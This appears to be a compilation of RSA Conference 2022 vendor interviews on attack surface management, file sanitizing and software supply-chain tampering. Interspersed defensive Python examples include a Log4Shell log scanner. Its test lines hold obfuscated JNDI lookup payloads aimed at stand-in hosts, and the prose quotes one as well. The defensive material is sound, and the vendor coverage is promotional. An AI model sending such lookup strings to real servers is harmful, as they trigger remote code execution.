Reducing the attack surface of a company’s network should, by now, be a top priority for all organizations.

Related: Why security teams ought to embrace complexity

As RSA Conference 2022 gets underway today in San Francisco, systems that help companies comprehensively inventory their cyber assets, so that they can see and fix asset and cloud misconfigurations and close security gaps, will be in the spotlight.

As always, the devil is in the details. Connecting the dots and getting everyone on the same page remain daunting challenges. I visited with Erkang Zheng, founder and CEO of JupiterOne, to discuss how an emerging discipline, referred to as "cyber asset attack surface management," or CAASM, can help with this heavy lifting.

Based in Morrisville, NC, JupiterOne launched in 2020 and last week announced that it has achieved a $1 billion valuation, with a $70 million Series C funding round.

For a full drill down, please give the accompanying podcast a listen. Here are my takeaways:

Imposing context

Remediating security gaps in modern networks, not surprisingly, can quickly devolve into a tangled mess. Both the technology and the teams responsible for specific cyber assets tend to operate in silos. And because network security teams lack direct control over those assets, coordinating people, policies and infrastructure scattered across the organization has become very hard to do in a timely manner.

This is all the more true as organizations accelerate cloud migration and dive deeper into an interconnected digital ecosystem. Software-defined everything is the mantra and mushrooming complexity is the result. Meanwhile, security gaps are multiplying as network attack surfaces expand rapidly. These gaps must be closed or digital transformation will be in danger of stalling out.

Enter CAASM, which is designed to make it possible for security teams to impose context on the ephemeral connections flying between things like microservices, virtual storage and hosted services. JupiterOne's platform, for instance, puts a security lens on discovering, managing and governing all types of cyber assets, from software in development to all aspects of private cloud and public cloud IT infrastructure.

CAASM systems leverage APIs to help security teams gain comprehensive visibility of all components of IT infrastructure be they on-premises or in a private, public or hybrid cloud. This enables the implementation of granular policies that can be enforced, at scale, and that each organization can dial in to boost security without unduly hindering agility.

This is the heavy lifting that’s easier said than done, especially in a massively-distributed, fast-changing operating environment. The pressure bears down on security teams from two directions, Zheng says. They must do as much as they can to directly prevent intrusions; and they must also rally the asset owners to prevent breaches as well as respond with alacrity to security incidents as they crop up.

Smart questions

Connecting the dots and getting everyone on the same page comes down to asking the right questions, Zheng observes. And cloud-hosted, data analytics technology is now readily available to ask smart questions about network security, at scale, and get actionable answers.


“The concept is simple, but the execution is not,” he says. The first obstacle is the underlying technology; networking infrastructure components come from hundreds of different vendors, each using a proprietary implementation. Then there’s the issue of having to change the behaviors of the asset owners, many of whom are stuck in a siloed mindset.

JupiterOne’s solution prepares the way by discovering, normalizing and consolidating basic information about all cyber assets, such as what the asset is, who owns it and who can access it. This creates a scenario where the security team can ask simple questions that can and should be directly answered.

“Know what you have and focus on what matters,” Zheng told me. “It really boils down to that.”

By focusing on common-sense questions, legacy workflows can be altered in a way that keeps pace with a fast-changing digital ecosystem – and recalcitrant asset owners will be more likely to take charge of facilitating remediation, he says.

“We can help provide a workflow that focuses on questions like, ‘How do I fix it?’ ‘Who can fix it?’ ‘How do I notify, assign and track and verify?’ ” Zheng observes. “The security team really is the gatekeeper and the auditor and a consultant, to some extent, to the people who must actually do the work . . . CAASM is not only a data platform and an analytical platform, but also a collaboration platform.”

Solutions at hand

Collaborating to swiftly close severe vulnerabilities as they get disclosed, like Log4Shell in the Log4j library, which was a zero-day when it surfaced, has become a must-have capability, for obvious reasons. Yet there is a much greater impact CAASM systems could have, going forward. CAASM is one slice of a new security architecture that's taking shape, one in which companies begin to systematically discover and remediate security gaps, the very gaps threat actors are proactively seeking out.

Zheng walked me through an example of how easy it is for a security team to overlook gaps created, for instance, in the mixing and matching of cloud resources leased from Amazon Web Services:

“Let’s say you have an internal resource that’s not configured to be public facing by itself. However, you have an external-facing workload that has an authentication policy giving it API level access . . . it could be an instance where you have an Internet-facing Lambda function that’s given access to an internal S3 bucket or DynamoDB table. That’s a specific example of identifying a security gap that you previously didn’t see.”

This technical detail vividly illustrates attack surface expansion in action. There are countless more examples like this. Companies absolutely should begin flushing out security gaps and remediating them. The technology to do this at scale and in a timely manner is at hand.
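The gap Zheng describes is a question about a graph, not about any single asset: is there a path from something the Internet can reach to a data store that was never meant to be public? The following is an added example, not JupiterOne's code or query language, that models a small AWS inventory as a graph and searches for exactly that kind of "toxic combination." The inventory, resource names and policy edges are constructed for the demonstration.

```python
"""
Added example (not JupiterOne code): model a small AWS inventory as a graph and
find "toxic combinations": an internet-reachable workload that can read a
resource which is itself not public. The inventory below is constructed for the
demonstration; the asset names and policy edges are hypothetical.
"""
from collections import deque

# Constructed inventory: each asset has a type, an exposure flag and edges to the
# assets it can reach (a role the workload assumes, a resource a policy grants).
INVENTORY = {
    "lambda:orders-api":    {"type": "lambda",         "internet_facing": True,  "edges": ["role:orders-api-role"]},
    "lambda:nightly-etl":   {"type": "lambda",         "internet_facing": False, "edges": ["role:etl-role"]},
    "role:orders-api-role": {"type": "iam_role",       "internet_facing": False, "edges": ["s3:customer-exports", "dynamodb:orders"]},
    "role:etl-role":        {"type": "iam_role",       "internet_facing": False, "edges": ["s3:customer-exports"]},
    "s3:customer-exports":  {"type": "s3_bucket",      "internet_facing": False, "edges": []},
    "dynamodb:orders":      {"type": "dynamodb_table", "internet_facing": False, "edges": []},
    "s3:public-assets":     {"type": "s3_bucket",      "internet_facing": True,  "edges": []},
}
DATA_STORE_TYPES = {"s3_bucket", "dynamodb_table"}


def reachable_paths(graph, start):
    """Breadth-first search from start; returns {node: path} for every node reachable from it."""
    paths = {start: [start]}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nxt in graph[node]["edges"]:
            if nxt not in paths:
                paths[nxt] = paths[node] + [nxt]
                queue.append(nxt)
    return paths


def find_toxic_combinations(graph):
    """Return (entry_point, data_store, path) triples where an internet-facing
    asset can reach a non-public data store through role/policy edges."""
    findings = []
    for name, asset in graph.items():
        if not asset["internet_facing"]:
            continue
        for target, path in reachable_paths(graph, name).items():
            t = graph[target]
            if target != name and t["type"] in DATA_STORE_TYPES and not t["internet_facing"]:
                findings.append((name, target, path))
    return findings


if __name__ == "__main__":
    for entry, store, path in find_toxic_combinations(INVENTORY):
        print(f"{entry} can reach private {store} via {' -> '.join(path)}")
```

Run as written, the search reports that the public orders-api function reaches both the private export bucket and the orders table through its role, while the nightly ETL function, which has the same bucket access, is not flagged because nothing on the Internet can invoke it. The fix is to cut an edge (narrow the role's policy), and re-running the search is the verification.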

The sooner closing gaps rises to a standard best practice, the more secure we’ll all be. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

Pity the poor CISO at any enterprise you care to name.

Related: The rise of ‘XDR’

As their organizations migrate deeper into an intensively interconnected digital ecosystem, CISOs must deal with cyber attacks raining down on all fronts. Many are working with siloed security products from another era that serve as mere speed bumps. Meanwhile, security teams are stretched thin and on a fast track to burn out.

Help is on the way. At RSA Conference 2022, which opened today in San Francisco, new security frameworks and advanced, cloud-centric security technologies will be in the spotlight. The overarching theme is to help CISOs gain a clear view of all cyber assets, be able to wisely triage exposures and then also become proficient at swiftly mitigating inevitable breaches.

Easier said than done, of course. I had the chance to discuss this with Lori Smith, director of product marketing at Trend Micro. With $1.7 billion in annual revenue and 7,000 employees, Trend Micro is a prominent leader in the unfolding shift towards a more holistic approach to enterprise security, one that’s a much better fit for the digital age. For a full drill down on our discussion, please give the accompanying podcast a listen. Here are key takeaways.

Beyond silos

It was only a few short years ago that BYOD and Shadow IT exposures were the hot topics at RSA. Employees using their personally-owned smartphones to install whatever new apps they liked presented a nightmare for security teams.

Fast forward to today. Enterprises are driving towards a dramatically scaled-up and increasingly interconnected digital ecosystem. The attack surface of company networks has expanded dramatically, and fresh security gaps are popping up everywhere.

What’s more, the rapid rise of a remote workforce, in the wake of Covid-19, has only served to accelerate cloud migration, as well as scale up the attendant network exposures. Unmanaged smartphones and laptops, misconfigured Software as a Service (SaaS) apps and unsecured Internet access present more of an enterprise risk than ever.

“The increased number of these cyber assets means that there’s more cyber assets that can potentially be vulnerable,” Smith says. “This opens up an even bigger and more profitable attack surface that cybercriminals are only too eager to target and exploit.”


In this hyperkinetic environment, a harried CISO needs to be able to visualize risk from a high level, as if it were moving in slow motion, and then make smart, strategic decisions. No single security solution now does this; there is no silver bullet. And the usual collection of security tools (firewall, endpoint detection, intrusion detection, SIEM and so on), typically arranged as siloed layers to protect on-premises networks, falls short as well, Smith says.

See, assess, mitigate

In life, solving any complex challenge often comes down to going back to basics. Enterprises can head down several viable paths to start doing this, with respect to network security. Trend Micro is in the camp advocating that a more holistic security posture can be attained through securing three fundamental capabilities.

The first is the ability to see everything. Enterprises need to gain a crystal-clear view of every component of on-premises, private cloud and public cloud IT infrastructure, Smith says. This is not a snapshot; it’s more of a process of continuously discovering evolving tools, services and behaviors, she says.

Observes Smith: “This is about gaining visibility into all cyber assets, internal and external, and answering questions like, ‘What is my attack surface?’ and ‘How well can I see all the assets in my environment?’ ‘How many assets do I have?’ ‘What types?’ ‘What kinds of profiles do my assets have and how is that changing over time?’”

Discovering and continuously monitoring all cyber assets enables the second essential capability: doing strategic risk assessments to gain important insight into the status of their cyber risks and security posture. Need a roadmap? CISOs need only to follow the principles honed over the past 200 years by the property and casualty insurance industry.

It comes down to taking an informed approach to triaging cyber exposures, Smith says. Organizations need better insight in order to prioritize the actions that will reduce their risk the most. That same insight identifies which security controls should be in place for a given cyber asset. For example, strong authentication and least-privilege access should be mandatory for sensitive assets but may be unnecessary for benign ones.

The third capability has to do with mitigating risks. Data analytics and automation can very effectively be applied to dialing in the optimum mix of security and agility, at scale. “This is about applying the right controls,” Smith says. “Whether that’s automated remediation action using security playbooks or prioritizing and proactively implementing recommended actions to lower risk.”

Towards holistic security

It’s remarkable – and telling – that Trend Micro got its start in 1988 as the supplier of a siloed security product: antivirus software. The company has evolved to stay in step with the evolution of network architectures and a threat landscape in which threat actors always seem to operate several steps ahead of security teams.

Trend Micro One, its unified security platform, along with its XDR capabilities, represent the latest iteration of its product strategy. Consolidating native Trend Micro tools and services with partner solution integrations will help enterprises put aside their siloed defense mentality and achieve comprehensive security in a powerful way.

“For effective security, you must have protection, detection, and response in place,” Smith says. “And you must have that continuous attack surface discovery and risk assessment so that you are prioritizing your actions and optimizing your security controls appropriately . . . I think that’s why we’re seeing security platforms, in general, gaining traction; because today’s environment requires that holistic approach.”

The rise of security platforms optimized for modern networks is an encouraging development. It’s early; there’s more to come. I’ll keep watch and keep reporting.


The zero trust approach to enterprise security is well on its way to mainstream adoption. This is a very good thing.

Related: Covid 19 ruses used in email attacks

At RSA Conference 2022, which takes place next week in San Francisco, advanced technologies to help companies implement zero trust principles will be in the spotlight. Lots of innovation has come down the pike with respect to imbuing zero trust into two pillars of security operations: connectivity and authentication.

However, there’s a third pillar of zero trust that hasn’t gotten quite as much attention: directly defending data itself, whether it be at the coding level or in business files circulating in a highly interconnected digital ecosystem. I had a chance to discuss the latter with Ravi Srinivasan, CEO of  Tel Aviv-based Votiro which launched in 2010 and has grown to  .

Votiro has established itself as a leading supplier of advanced technology to cleanse weaponized files. It started with cleansing attachments and weblinks sent via email and has expanded to sanitizing files flowing into data lakes and circulating in file shares. For a full drill down on our discussion, please give the accompanying podcast a listen. Here are key takeaways.

Digital fuel

Votiro’s new cloud services fit into a pillar of zero trust that is only now getting more attention: directly protecting digital content in and of itself. Zero trust, put simply, means eliminating implicit trust. Much has been done with connectivity and authentication. By contrast, comparatively little attention has been paid to applying zero trust directly to data and databases, Srinivasan observes. But that needs to change, he says. Here’s his argument:

Companies are competing to deliver innovative digital services faster and more flexibly than ever. Digital content creation is flourishing with intellectual property, financial records, marketing plans and legal documents circulating within a deeply interconnected digital ecosystem.

Digital content has become the liquid fuel of digital commerce—and much of it now flows into and out of massive data lakes supplied by Amazon Web Services, Microsoft Azure and Google Cloud. This transition happened rapidly, with scant attention paid to applying zero trust principles to digital content.

However, a surge of high-profile ransomware attacks and supply chain breaches has made company leaders very nervous. “I speak to a lot of security leaders around the world, and one of their biggest fears is the rapid rise of implementing data lakes and the fear that the data lake will turn into a data swamp,” Srinivasan says.

Votiro’s technology provides a means to sanitize weaponized files at all of the points where threat actors are now trying to insert them. It does this by passing only known-good content into a network, while extracting unknown and untrusted elements for analysis. Votiro refined this service cleansing weaponized attachments and web links sent via email, and has extended it to cleansing files as they flow into a data lake and as they circulate in file shares.
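The principle behind that kind of sanitizing, often called content disarm and reconstruction, is to rebuild a file from the parts a legitimate document needs rather than to hunt for bad parts. Here is an added example, not Votiro's code, that does this for a Word document: a .docx is a zip archive of XML parts, macros live in word/vbaProject.bin and are advertised in [Content_Types].xml, and the sanitizer writes a fresh archive containing only an allowlist of part names. The macro-enabled sample document is constructed in memory; the byte strings standing in for the VBA project and the OLE object are fake.

```python
"""
Added example (not Votiro's code): a minimal content-disarm step for .docx
files. A .docx is a zip of XML parts; macros live in word/vbaProject.bin and are
declared in [Content_Types].xml. Rather than scanning for "bad" content, the
sanitizer rebuilds a new archive keeping only an allowlist of part names and
drops everything else (the untrusted remainder can be set aside for analysis).
The sample document is constructed in memory; it is not a real file.
"""
import io
import re
import zipfile

# Parts a plain Word document legitimately needs (an allowlist, not a blocklist).
ALLOWED_PARTS = {
    "[Content_Types].xml",
    "_rels/.rels",
    "word/document.xml",
    "word/_rels/document.xml.rels",
    "word/styles.xml",
}
MACRO_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
MACRO_OVERRIDE = re.compile(r"<Override[^>]*" + re.escape(MACRO_CONTENT_TYPE) + r"[^>]*/>")


def build_sample_docm() -> bytes:
    """Constructed macro-enabled document: minimal parts plus a fake VBA project and OLE object."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(
            "[Content_Types].xml",
            '<?xml version="1.0"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
            f'<Override PartName="/word/vbaProject.bin" ContentType="{MACRO_CONTENT_TYPE}"/>'
            "</Types>",
        )
        z.writestr("_rels/.rels", "<Relationships/>")
        z.writestr("word/document.xml", "<w:document><w:body><w:p>Invoice attached</w:p></w:body></w:document>")
        z.writestr("word/_rels/document.xml.rels", "<Relationships/>")
        z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 fake VBA project (constructed)")
        z.writestr("word/embeddings/oleObject1.bin", b"fake OLE object (constructed)")
    return buf.getvalue()


def sanitize_docx(data: bytes):
    """Rebuild the archive from the allowlist. Returns (clean_bytes, dropped_part_names)."""
    src = zipfile.ZipFile(io.BytesIO(data))
    out = io.BytesIO()
    dropped = []
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as z:
        for name in src.namelist():
            if name not in ALLOWED_PARTS:
                dropped.append(name)
                continue
            content = src.read(name)
            if name == "[Content_Types].xml":
                # Remove the content-type override advertising the VBA project, so the
                # rebuilt package does not declare a part that no longer exists.
                content = MACRO_OVERRIDE.sub("", content.decode("utf-8"))
            z.writestr(name, content)
    return out.getvalue(), dropped


def list_parts(data: bytes):
    return sorted(zipfile.ZipFile(io.BytesIO(data)).namelist())


def read_part(data: bytes, name: str) -> str:
    return zipfile.ZipFile(io.BytesIO(data)).read(name).decode("utf-8")


if __name__ == "__main__":
    clean, dropped = sanitize_docx(build_sample_docm())
    print("dropped:", dropped)
    print("kept:   ", list_parts(clean))
```

The allowlist is the important design choice: a new part name the sanitizer has never seen is dropped by default, which is the "eliminate implicit trust" stance applied to file content. A production implementation would also validate that each kept XML part parses cleanly and would recurse into nested archives, the case in the zip-inside-an-email example later in this piece.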

Exploiting fresh gaps

As agile, cloud-centric business communications have taken center stage, cyber criminals quite naturally have turned their full attention to inserting weaponized files wherever it’s easiest for them to do so, Srinivasan observes. As always, the criminals follow the data, he says.


“The trend that we’re seeing is that more than 30 percent of the content flowing into data lakes is from untrusted sources,” he says. “It’s documents, PDFs, CSV files, Excel files, images, lots of unstructured data; we track 150 different file types . . . we’re seeing evasive objects embedded in those files designed to propagate downstream within the enterprise.”

This is the dark side of digital transformation. Traditionally, business applications tapped into databases kept on servers in a temperature-controlled clean room — at company headquarters. These legacy databases were siloed and well-protected; there was one door in and one door out.

Data, both code and content, today fly around intricately connected virtual servers running in private clouds and public clouds. As part of this very complex, highly distributed architecture, unstructured data flows from myriad sources into and back out of partner networks, cloud file shares and data lakes. This in-flow and out-flow happens via custom-coded APIs configured by who knows whom.

Votiro’s cleansing scans work via an API that attaches to each channel of content flowing into a data lake. This cleansing process is shedding light on the fresh security gaps cyber criminals have discovered – and have begun exploiting, Srinivasan says.

Evolving attacks

He told me about this recent example: an attacker was able to slip malicious code into a zip file sent from an attorney to a banking client in a very advanced way. The attacker managed to insert attack code into a zip file contained in a password-protected email message – one that the banker was expecting to receive from the attorney.

At a fundamental level, this attacker was able to exploit gaps in the convoluted matrix of interconnected resources the bank and law firm now rely on to conduct a routine online transaction. “Bad actors are constantly evolving their techniques to compromise the organization’s business services,” Srinivasan says.

Closing these fresh gaps requires applying zero trust principles to the connectivity layer, the authentication layer and the content layer, he says. “What we’re doing is to deliver security as a service that works with the existing security investments companies have made,” Srinivasan says. “We integrate with existing edge security and data protection capabilities as that final step of delivering safe content to users and applications at all times.”

It’s encouraging that zero trust is gaining material traction at multiple layers. There’s a lot more ground to cover. I’ll keep watch and keep reporting.


It’s not difficult to visualize how companies interconnecting to cloud resources at a breakneck pace contribute to the outward expansion of their networks’ attack surface.

Related: Why ‘SBOM’ is gaining traction

If that wasn’t bad enough, the attack surface companies must defend is expanding inwardly, as well – as software tampering at a deep level escalates.

The SolarWinds breach and the disclosure of the massive Log4j vulnerability have put company decision makers on high alert with respect to this freshly-minted exposure. Findings released this week by ReversingLabs show 87 percent of security and technology professionals view software tampering as a new breach vector of concern, yet only 37 percent say they have a way to detect it across their software supply chain.

I had a chance to discuss software tampering with Tomislav Pericin, co-founder and chief software architect of ReversingLabs, a Cambridge, MA-based vendor that helps companies granularly analyze their software code. For a full drill down on our discussion please give the accompanying podcast a listen. Here are the big takeaways:

‘Dependency confusion’

Much of the discussion at RSA Conference 2022, which convenes next week in San Francisco, will boil down to slowing attack surface expansion. This now includes paying much closer attention to the elite threat actors who are moving inwardly to carve out fresh vectors taking them deep inside software coding.

The perpetrators of the SolarWinds breach, for instance, tampered with the build system of the widely-used Orion network management tool. They then were able to trick some 18,000 customers into deploying an authentically-signed Orion update carrying a heavily-obfuscated backdoor.

Log4Shell refers to a gaping vulnerability in Log4j, an open-source Java logging library that’s deeply embedded within servers and applications all across the public Internet. The library’s job is to record events in a log for a system administrator to review and act upon; the flaw is that a logged message containing a lookup string such as ${jndi:ldap://<attacker host>/...} makes the library fetch and run code from the named server. Left unpatched, Log4Shell presents a ripe opportunity for a bad actor to carry out remote code execution attacks, Pericin told me.

Attacks of this type exploit the layered, loosely coupled way modern software is assembled to make digital services possible: a library buried several dependencies deep can be reached by any input that ends up in a log line.
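Because the payload is a string, the first thing a security team did in December 2021 was grep logs for "jndi", and the first thing attackers did was hide that word behind Log4j's own nested lookups and URL encoding. The following is an added example, not from the article or from ReversingLabs, of detection logic that undoes those layers before matching, run over constructed web-server log lines (the addresses are TEST-NET documentation addresses; nothing here is a real request).

```python
"""
Added example (not from the article or ReversingLabs): detection logic for
Log4Shell-style payloads run over constructed log lines. The exploit string is a
Log4j lookup of the form ${jndi:<scheme>://host/path}; attackers hide the literal
"jndi" with nested lookups such as ${lower:j} or ${::-j} and with URL encoding,
so a plain substring match misses them. The scanner undoes those layers first.
"""
import re
from urllib.parse import unquote

INNERMOST = re.compile(r"\$\{([^${}]*)\}")   # a lookup with no lookup nested inside it
JNDI = re.compile(r"jndi:", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup; an approximation of Log4j's substitution,
    enough to unmask the common evasions."""
    m = re.match(r"(lower|upper):(.*)", body, re.DOTALL)
    if m:
        return m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper()
    if ":-" in body:                 # ${env:NOPE:-x} and ${::-x} both fall back to "x"
        return body.rsplit(":-", 1)[1]
    return body                      # unknown lookup: keep its text, drop the braces


def normalize(s: str) -> str:
    s = unquote(unquote(s))          # undo single or double URL encoding
    while True:
        new = INNERMOST.sub(lambda m: _resolve(m.group(1)), s)
        if new == s:
            return s
        s = new


def scan(lines):
    """Return [(line_index, normalized_line)] for lines carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((i, norm))
    return hits


# Constructed access-log lines: one benign, four payload variants, one benign with a harmless lookup.
SAMPLE_LOG = [
    '203.0.113.9 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${lower:rmi}://203.0.113.5/x}"',
    '203.0.113.5 - - "GET /?q=${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.5/y} HTTP/1.1" 404 "-"',
    '203.0.113.5 - - "GET /?u=%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.5%2Fz%7D HTTP/1.1" 404 "-"',
    '203.0.113.9 - - "GET /?msg=${ctx:requestId} HTTP/1.1" 200 "-"',
]

if __name__ == "__main__":
    for i, norm in scan(SAMPLE_LOG):
        print(f"line {i}: {norm}")
```

The point of the normalize step is that every evasion the attacker adds is something the vulnerable library itself would evaluate, so a detector that mimics that evaluation sees what the server saw. Detection is still no substitute for the upgrade; it tells you who tried, not whether the lookup succeeded.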


“As we go about defining layers on top of layers of application code, understanding all the interdependencies becomes very complex,” Pericin told me. “You really need to go deep into all of these layers to be able to understand if there’s any hidden behaviors or unaccounted for code that introduce risk in any of the layers.”

Obfuscated tampering

Dependency confusion arises when a package manager is allowed to look for a package in more than one place. Companies publish their internal packages to a private registry; if an attacker registers the same package name on the public registry with a higher version number, a build that consults both registries can pull the attacker’s copy instead. Modern software is built on pillars of open-source components, and package repositories offer easy access to the wealth of pre-built code that makes development faster. However, not all of that code is safe to use. Capitalizing on dependency confusion, threat actors seek ways to insert malicious elements, and they take intricate steps to obfuscate their code tampering. Most often their objective is to install a backdoor through which they can come and go, and take full control of the underlying system anytime they please, Pericin says.

In early 2021, white hat researcher Alex Birsan shed a bright light on just how big an opportunity this presents to malicious hackers. Birsan demonstrated how dependency confusion attacks could be leveraged to get his own code running deep inside the internal systems of Apple, PayPal, Tesla, Netflix, Uber, Shopify and Yelp.

Then in late April, ReversingLabs and other vendors shared stunning evidence of such attacks moving beyond the theoretical and into live service. A red team of security researchers dissected a dependency confusion campaign aimed at taking control of the networks of leading media, logistics and industrial firms in Germany.

The basic definition of software tampering, Pericin notes, is to insert unverified code into the authorized code base. In the current operating environment, there’s limitless opportunity to tamper with code. This is because such a high premium is put on agility.

“There are many places in the software supply chain where you can add unverified code, and the attackers are actually doing that,” Pericin says. “And that’s also why it can be so hard to detect.”
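To make the resolution mistake concrete, here is an added example, not ReversingLabs' code, with two tiny package indexes constructed for the purpose. The vulnerable resolver merges the private and public indexes and takes the highest version, which is how Birsan's packages got installed; the hardened resolver binds each dependency to one source, one version and an artifact hash recorded in a lockfile, which also refuses an artifact that has been rebuilt behind the lockfile's back. The package name, versions and artifact bytes are hypothetical.

```python
"""
Added example (not ReversingLabs code): how dependency confusion arises in a
package resolver and how to close it. The build asks for the internal package
"acme-billing-utils" (private index, 1.4.2). An attacker publishes the same name
on the public index at 99.0.0. A resolver that merges both indexes and takes the
highest version pulls the attacker's copy. The hardened resolver looks only in
the locked source, at the locked version, and verifies the artifact hash.
Both indexes and the lockfile are constructed for the demonstration.
"""
import hashlib


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed package indexes: name -> {version: artifact bytes}
PRIVATE_INDEX = {
    "acme-billing-utils": {"1.4.2": b"acme-billing-utils-1.4.2 (internal build)"},
}
PUBLIC_INDEX = {
    "requests":           {"2.28.0": b"requests-2.28.0 (public)"},
    "acme-billing-utils": {"99.0.0": b"acme-billing-utils-99.0.0 (attacker upload; install hook runs code)"},
}


def _vkey(version: str):
    return tuple(int(x) for x in version.split("."))


def resolve_vulnerable(name: str):
    """Merge both indexes and pick the highest version, whatever its source."""
    candidates = []
    for source, index in (("private", PRIVATE_INDEX), ("public", PUBLIC_INDEX)):
        for version, artifact in index.get(name, {}).items():
            candidates.append((_vkey(version), version, source, artifact))
    if not candidates:
        raise LookupError(name)
    _, version, source, _ = max(candidates)
    return {"name": name, "version": version, "source": source}


# Hardened side: every dependency pinned to a source, a version and an artifact hash.
LOCKFILE = {
    "acme-billing-utils": {"source": "private", "version": "1.4.2",
                           "sha256": sha256(PRIVATE_INDEX["acme-billing-utils"]["1.4.2"])},
    "requests":           {"source": "public", "version": "2.28.0",
                           "sha256": sha256(PUBLIC_INDEX["requests"]["2.28.0"])},
}


def verify_artifact(name: str, artifact: bytes) -> bool:
    """True if the artifact matches the hash pinned in the lockfile."""
    return name in LOCKFILE and sha256(artifact) == LOCKFILE[name]["sha256"]


def resolve_hardened(name: str):
    """Look only in the locked source, at the locked version, and verify the hash."""
    if name not in LOCKFILE:
        raise LookupError(f"{name}: not in lockfile; refusing to resolve")
    lock = LOCKFILE[name]
    index = PRIVATE_INDEX if lock["source"] == "private" else PUBLIC_INDEX
    artifact = index.get(name, {}).get(lock["version"])
    if artifact is None:
        raise LookupError(f"{name}=={lock['version']} missing from the {lock['source']} index")
    if not verify_artifact(name, artifact):
        raise ValueError(f"{name}: artifact hash mismatch, possible tampering")
    return {"name": name, "version": lock["version"], "source": lock["source"]}


if __name__ == "__main__":
    print("vulnerable:", resolve_vulnerable("acme-billing-utils"))
    print("hardened:  ", resolve_hardened("acme-billing-utils"))
```

Real package managers expose the same two controls under different names (per-package index mapping or scoped namespaces, and hash-pinned lockfiles); the example shows why both are needed, since a source pin alone stops the public-index substitution but not a rebuilt artifact on the private side.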

Implementing SBOM

Even as their organizations push more operations out to the Internet edge, senior executives are starting to realize that their internal attack surface is riddled with security holes, as well. Some 98 percent of the respondents to the ReversingLabs poll acknowledged that software supply chain risks are rising, because of their intensive use of third-party and open source code. However, only 51 percent believed they could prevent their software from being tampered with.

For its part, ReversingLabs supplies an advanced code scanning and analysis service, called Software Assurance, that can help companies verify that their applications haven’t been tampered with. Software developers at large shops are getting into the habit of using this tool to deeply scan software packages as a final quality check, just before deployment, Pericin told me.

Some companies are going so far as using this tool to selectively scan mission-critical software arriving from smaller houses and independent developers for behavioral oddities, as well, he says.

Having the ability to granularly scan code also plays well with the drive to mainstream SBOM, which stands for Software Bill of Materials.

SBOM is an industry effort to standardize a machine-readable inventory of the components, with their versions and suppliers, that make up a software application; CycloneDX and SPDX are the two main formats.

President Biden’s cybersecurity executive order (EO 14028), issued in May 2021, includes an SBOM requirement for software sold to the federal government.

And now advanced scanning tools, like those supplied by ReversingLabs, are ready for prime time – to help companies detect and deter software tampering, as well as implement SBOM as a standard practice.

“One of the outcomes of doing this analysis is you gain the ability to correctly identify what’s present in the software package, which is the software bill of materials,” Pericin observes.
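Pericin's point is that an SBOM is only useful if something checks it against what actually shipped. As an added example, not ReversingLabs' Software Assurance product, the following reconciles a minimal CycloneDX 1.4 JSON bill of materials with a constructed "delivered package" (a dict of component name to version and bytes, standing in for the unpacked artifact) and reports the three discrepancies that matter: declared but missing, present but undeclared, and hash mismatch. The component names are real library names used only as labels; the bytes and hashes are fabricated for the demonstration.

```python
"""
Added example (not ReversingLabs' product): reconciling a software bill of
materials with what actually shipped. SBOM_JSON is a minimal CycloneDX 1.4
document (the real schema has many more fields); DELIVERED is a constructed
stand-in for the unpacked artifact. Reported: components declared but absent,
components present but never declared (the software-tampering signal), and
components whose hash no longer matches.
"""
import hashlib
import json


def _h(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


SBOM_JSON = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "components": [
        {"type": "library", "name": "log4j-core", "version": "2.17.1",
         "hashes": [{"alg": "SHA-256", "content": _h(b"log4j-core-2.17.1.jar")}]},
        {"type": "library", "name": "jackson-databind", "version": "2.13.3",
         "hashes": [{"alg": "SHA-256", "content": _h(b"jackson-databind-2.13.3.jar")}]},
        {"type": "library", "name": "commons-text", "version": "1.9",
         "hashes": [{"alg": "SHA-256", "content": _h(b"commons-text-1.9.jar")}]},
    ],
})

# Constructed delivered package: log4j-core matches, jackson-databind was rebuilt
# (hash differs), commons-text is missing, and an undeclared component appeared.
DELIVERED = {
    "log4j-core":       ("2.17.1", b"log4j-core-2.17.1.jar"),
    "jackson-databind": ("2.13.3", b"jackson-databind-2.13.3.jar (rebuilt with an extra class)"),
    "evil-helper":      ("0.0.1",  b"evil-helper-0.0.1.jar"),
}


def load_sbom(text: str):
    """Parse the CycloneDX document into {name: {version, sha256}}."""
    doc = json.loads(text)
    if doc.get("bomFormat") != "CycloneDX":
        raise ValueError("unsupported SBOM format")
    declared = {}
    for c in doc["components"]:
        sha = next((x["content"] for x in c.get("hashes", []) if x["alg"] == "SHA-256"), None)
        declared[c["name"]] = {"version": c["version"], "sha256": sha}
    return declared


def reconcile(sbom_text: str, delivered: dict):
    declared = load_sbom(sbom_text)
    report = {"ok": [], "missing": [], "mismatch": [], "undeclared": []}
    for name, entry in declared.items():
        if name not in delivered:
            report["missing"].append(name)
            continue
        version, blob = delivered[name]
        if version != entry["version"] or entry["sha256"] != _h(blob):
            report["mismatch"].append(name)
        else:
            report["ok"].append(name)
    report["undeclared"] = sorted(set(delivered) - set(declared))
    return report


def is_trustworthy(report) -> bool:
    return not (report["missing"] or report["mismatch"] or report["undeclared"])


if __name__ == "__main__":
    r = reconcile(SBOM_JSON, DELIVERED)
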